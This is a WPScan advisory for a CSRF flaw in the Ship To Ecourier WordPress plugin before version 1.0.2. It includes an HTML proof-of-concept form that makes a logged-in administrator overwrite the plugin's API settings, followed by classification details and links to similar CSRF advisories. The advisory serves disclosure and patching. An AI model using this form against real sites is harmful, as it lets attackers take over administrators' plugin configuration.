WordPress Plugin Vulnerabilities

Ship To Ecourier < 1.0.2 - Plugin's Settings Update via CSRF

Description

The plugin did not properly check for CSRF, allowing attackers to make a logged in administrator update the plugin's settings

Proof of Concept

<html>
  <body>
    <form action="https://example.com/wp-admin/admin.php?page=ship-to-ecourier" method="POST">
      <input type="hidden" name="user_id" value="Attacker" />
      <input type="hidden" name="api_key" value="CSRF" />
      <input type="hidden" name="api_secret" value="Attacker" />
      <input type="hidden" name="api_environment" value="staging" />
      <input type="hidden" name="submit_ste_ecourier_settings" value="Save Settings" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Affects Plugins

Plugin icon
ship-to-ecourier
Fixed in 1.0.2

Classification

Type
CSRF
OWASP top 10
A2: Broken Authentication and Session Management
CWE
CWE-352
CVSS
5.4 (medium)

Miscellaneous

Original Researcher
WPScanTeam
Verified
Yes
WPVDB ID
c84ce716-f7ed-449c-b41d-daff9f19174e

Timeline

Publicly Published
2021-05-05 (about 3 years ago)
Added
2021-05-05 (about 3 years ago)
Last Updated
2021-05-05 (about 3 years ago)

Other

Published
Title
Published
2024-02-26
Title
Watermark RELOADED <= 1.3.5 - Cross-Site Request Forgery via optionsPage
Published
2023-02-28
Title
OAuth Single Sign On - SSO (OAuth Client) Free < 6.24.2 - IdP Deletion via CSRF
Published
2024-04-26
Title
Hide Dashboard Notifications < 1.3 - Cross-Site Request Forgery
Published
2021-09-20
Title
Scroll Baner <= 1.0 - CSRF to RCE
Published
2023-12-05
Title
Integrate Google Drive < 1.3.5 - Cross-Site Request Forgery